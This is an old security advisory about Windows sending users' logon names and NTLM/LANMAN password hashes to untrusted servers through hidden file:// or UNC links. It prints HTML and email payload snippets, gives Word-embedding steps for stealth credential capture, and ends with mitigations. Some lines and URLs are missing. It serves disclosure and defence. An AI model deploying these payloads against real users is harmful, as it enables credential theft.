Network File Resource


    Windows (All versions)


    'Eric  Hacker'  found  following.   Remote  access  to users logon
    credentials.  In most  scenarios passwords will be  encrypted, but

    Programs running on default  configurations of Windows can  easily
    be duped into sending a user’s logon name, domain or system  name,
    and plain-text or encrypted  password hash to non-trusted  servers
    over the Internet.  This can  occur by merely viewing a web  page,
    email, or certain  Office documents.   The attack can  be executed
    such that the user is unaware that anything unusual has  happened.
    Macros or scripting are not  required to make this work.   Partial
    solutions  are  available,  but  will  not  protect  all  users or

    Note: This  vulnerability is  not an  entirely new  discovery.   A
    variation of this attack using  only IE had been discussed  as far
    back as 97  on the BugTraq  and NTBugTraq lists.   The new  issues
    are that:

        - The file:// tag as well as UNC \\ pathnames can be used
        - This attack can easily be sent via email
        - Windows 2000 is vulnerable to this type of attack
        - There is not any way to configure this functionality or turn
          it off

    Vulnerable Operating Systems tested:

        - Windows 95,98 (W9x)
        - Windows NT4, SP6a (NT4)
        - Windows 2000, RTM (W2K)

    Vulnerable software tested:

        - Internet Explorer (IE) 5, 4
        - Netscape Navigator 4.0
        - Outlook 2000, 98
        - Outlook Express 98, 5
        - Eudora 4
        - Microsoft Word 97

    Assume many others.  Not all software was tested on all platforms.

    This attack  relies on  the file://  URL or  sometimes the  UNC \\
    pathname  to  point  to  a  resource  such  as a graphic.  Windows
    systems  with  NetBIOS  over  IP  enabled  and running a Microsoft
    Client will retrieve the resource  by attempting to log in  to the
    server providing the resource.  Thus if a link was


    one's system will try to log on to using the current
    logon credentials and retrieve the file.

    This will give the server:

        - The username currently logged on
        - The machine or domain name the user authenticated to
        - The encrypted LANMAN and NTLM hashes, or if W95 possibly the
          plain-text password (see below)

    This attack can be delivered by:

        - A  web  page,  as  an  embedded  link to a graphic or  other
          resource on a page visited from a browser.
        - An HTML formatted email, as an embedded link to a graphic or
          other resource.
        - In  a  Microsoft  Word  document,  as an embedded link to  a
        - When the W2K Windows Explorer preview pane displays an  HTML
        - Possibly many other ways. Happy hunting.

    Detailed Web Based:
    The first attack is to hide  a file:// or UNC link to  an embedded
    resource within a web  page.  This is  extremely easy to do.   The
    weakness is that a user has to visit the web page in order for the
    attack to take place.  HTML code would look something like this:

        <IMG SRC="file://">

    This may result  in broken graphics  displayed if the  file is not
    retrieved.  The preferred method  of hiding the request is  to use
    the background attribute of the  body tag.  This will  not display
    errors if the file is not retrieved.

        <BODY background=file:// bgColor=#ffffff>

    If pixel.gif is a 1x1 white image, the user will not notice if  it
    is displayed or not.  Unless  one views the source one would  have
    no idea the file is even there.  If the file is not available, one
    may notice that it seems to take a while for the page to  complete
    loading even though all text  is visible.  Another way  to prevent
    any errors from appearing is to  set up the guest account with  no
    password to allow  anonymous access to  the server.   Windows will
    always  try  the  cached  credentials  first.   When  the   cached
    credentials fail,  a server  will silently  allow anonymous access
    and deliver the file.

    IE     will     also     take     the     UNC     path      format
    \\\share\pixel.gif.   Netscape  (4.05)  will  not use
    this  format.   Research  indicates  that  this  was  the original
    problem reported in 1997 with IE  3.0, but Eric could be wrong  as
    the authors were not entirely clear.

    Detailed Mail based:
    Since most major mail programs on Windows support HTLM email using
    either the Netscape or IE engine for display, this same attack can
    be delivered by email.  An HTML message with the following:

        <BODY background=file:// bgColor=#ffffff NOSEND="1">

    will  activate  the  attack  when  the  user opens or previews the
    message.  The  NOSEND attribute will  keep Outlook from  embedding
    the file in the email message.  This will ensure that the link  is
    forwarded  if  the  mail  is  clever  enough  to  get  the initial
    recipient to  forward it.   Obviously the  mail based  version has
    the  benefit  of  being  directed  at  targets.   This  has   been
    successfully used in field testing.

    Detailed Document based:
    Links can also be placed in Microsoft Word documents.  To do this,
    open a word  document.  Choose  Insert:Picture:From File.   In the
    dialog box type the  UNC path for the  file name.  Check  "Link to
    File" and uncheck "Save with Document".  Word does not accept  the
    file:// URL.

    This linking does not require any macros to run.  If a small white
    graphic  is  used  the  viewer  will  have  no  idea  it is in the
    document.  Excel does not allow picture embedding in the same way.
    We assume other Office programs may be vulnerable; Eric did not do
    further testing.

    Windows 95 downgrading LANMAN authentication:
    According  to  Microsoft  TechNet  Bulletin  Q165403,  Windows  95
    versions  up  to  and  including  OEM  SR  2.1 can be tricked into
    downgrading  authentication  to  plaintext  passwords. There is an
    update for W95 available; see

    for  details.   Without  that  patch  these  systems are extremely
    vulnerable.    Enterprises  running   W95  should   verify   their
    configurations.  W98, NT4 sp3 or later and W2K are not  vulnerable
    to  plaintext  downgrading.  We  mention  this  because  we   have
    encountered a number of these systems in the field.


    Vendors  notified,  workarounds  available,  but  do  not  provide
    complete protection for all environments.

    Remedies that provide some protection:

        - Block all outgoing NetBIOS traffic at the firewalls
        - Disable NetBIOS on unneeded interfaces
        - Upgrade to or force NTLMv2 authentication for all clients
        - Use strong passwords and use passfilt.dll to require  strong
          passwords within a domain

    Upgrade to or force NTLMv2 authentication for all clients
    This will not  keep your username  and server name  from going out
    over the wire  if the untrusted  system also supports  NTLMv2.  It
    will make your password more  difficult to crack, but it  is still
    susceptible to dictionary/brute force attacks.  NTLMv2 raises  the
    bar, but does not completely protect you.

    For NT4 and W2K see

    for  the   details.   W9x   clients  can   now  also   use  NTLMv2
    authentication.  See

    for the details.

    Block all outgoing NetBIOS traffic at the firewalls
    This will not protect you  from those inside your network,  but it
    will  stop  outsiders  from  getting  any  information.   Everyone
    worries about inbound  traffic, but many  places don not  consider
    outbound.  Block TCP ports 138 and 139 for NetBIOS.

    Disable NetBIOS on unneeded interfaces
    This will protect some people some  of the time. Most of the  time
    there  is  no  reason  to  allow NetBIOS over dial-up connections.
    This will protect the person  with the corporate laptop when  they
    are home and dialing up to the Internet. One assumes the  firewall
    protects them in the office.

    Use strong passwords and use passfilt.dll to require strong passwords within a domain
    Strong passwords that do not  include common words but do  contain
    punctuation,  upper  and  lowercase   letters  and  numerals   are
    extremely hard  to crack.   All passwords  should be  the full  14
    available characters  on Windows.   Domain administrators  can use
    passfilt.dll to apply a filter that requires users to use stronger
    passwords.  For details on passfilt.dll see

    The restrictions in passfilt.dll  are not strong enough  to ensure
    that users will not dumb down their passwords.  This happens  when
    they just append special characters  to the ends of common  words.
    These passwords are only minimally harder to crack than dictionary
    words.  Anecdotal evidence shows this pattern is very common.

    Managers requiring a higher level of password sophistication  must
    write their own  passfilt.dll or wait  for Microsoft to  release a
    new one.  Instructions for writing your own are at

    Things that do not help:

        - Disable caching of  logon information. Only applies  between
        - Security settings in IE do  not provide a way to stop  this.
          The   authentication   settings   only   apply   to  http://
        - No macros or scripts are required; turning them off does not
          stop this.
        - Outlook cannot be configured to not display HTML emails.